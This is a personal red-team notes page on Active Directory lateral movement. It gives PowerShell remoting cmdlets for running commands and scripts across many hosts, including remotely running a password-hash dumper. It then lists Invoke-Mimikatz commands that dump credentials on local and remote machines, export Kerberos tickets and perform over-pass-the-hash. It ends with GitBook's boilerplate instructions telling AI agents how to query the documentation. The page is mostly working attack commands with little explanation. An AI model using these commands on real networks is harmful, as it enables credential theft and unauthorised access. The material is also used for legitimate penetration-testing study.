> For the complete documentation index, see [llms.txt](https://zeyad-abulaban.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://zeyad-abulaban.gitbook.io/notes/red-teaming/active-directory/lateral-movement.md). # Lateral Movement *** ## PowerShell Remoting * Enabled by deafult on server 2012 onwards. * On desktop windows machines you may need to enable it `Enable-PSRemoting` (Require admin privs). * You get elevated shell on remote system if admin creds are used to authenticate (Default setting). ## One-to-One ### PSSession * interactive * Runs in a new process (wsmprovhost) * Is stateful. ### Useful cmdlets ```powershell New-PSSession Enter-PSSession ``` ## One-to-many * Also know as Fan-Out-Remoting * Non-interactive * Executes commands parallely * Runs Commands and scripts on * Multiple computers * In disconnected sessions (v3) * As background jobs and more ### Useful cmdlets ```powershell Invoke-Command -ComputerName Invoke-Command -ComputerName (Get-Content ) Invoke-Command -ComputerName -Credential # To pass username/password ``` #### Usage Example ```powershell #To execute a command remotely Invoke-Command -scriptblock {whoami;Get-Process} -ComputerName -Credential #To execute script remotely Invoke-Command -FilePath C:\Path\Get-PassHashes.ps1 -ComputerName (Get-Content ) #Whenever you get an error when executing commands/scripts on remote machine check for Language mode because if it's in constrained mode you won't be able to execute anything but built-in cmdlets Invoke-Command -scriptblock {$ExecutionContext.SessionState.LanguageMode} -ComputerName -Credential ``` *** ## Mimikatz * This script is used to dump credentials,tickets and more. * Mimikatz with PowerShell is done without dropping `mimikatz.exe` to disk. * It is useful for passing and relaying hashes,tickets and for many active directory attacks. * The script needs admin privs for dumping creds from local machine. ### Usage ```powershell #Powersploit module #Dump credentials on a local machine (Default) Invoke-Mimikatz -DumpCreds #Dump creds on multiple remote machines Invoke-Mimikatz -DumpCreds -ComputerName @("system1","system2") #Above commands uses PowerShell cmdlet "Invoke-Command" to do their jobs. ``` ### Export all Kerberos tickets to disk. ```powershell #Powersploit module Invoke-Mimikatz -command '"kerberos::list /export"' ``` ### "Over pass the hash" generate tokens from hashes. ```powershell #Powersploit module Invoke-Mimikatz -command '"sekurlsa::pth /user:administrator /domain /ntlm: /run:powershell.exe"' ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://zeyad-abulaban.gitbook.io/notes/red-teaming/active-directory/lateral-movement.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.